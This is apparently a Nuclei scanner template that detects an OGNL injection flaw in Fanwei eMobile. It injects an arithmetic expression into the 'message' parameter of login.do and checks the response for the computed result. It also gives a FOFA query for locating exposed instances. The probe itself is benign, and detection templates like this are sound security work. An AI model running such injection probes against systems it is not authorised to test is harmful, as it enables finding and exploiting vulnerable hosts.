id: CNVD-2017-03561

info:
  name: Fanwei eMobile - OGNL Injection
  author: ritikchaddha
  severity: high
  description: |
    Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
  reference:
    - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
    - https://reconshell.com/vulnerability-research-list/
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="泛微-eMobile"
  tags: 泛微-EMobile
variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
      - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{result}}"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100a19d5752bad789894eba0dddececc58caa4a618e50d1f6d2109bbac1db709c8e02201a8311d7769252d7542068a74e72d0736274f596a91ebc45fb41e219b25e5fa7:922c64590222798bb761d5b6d8e72950
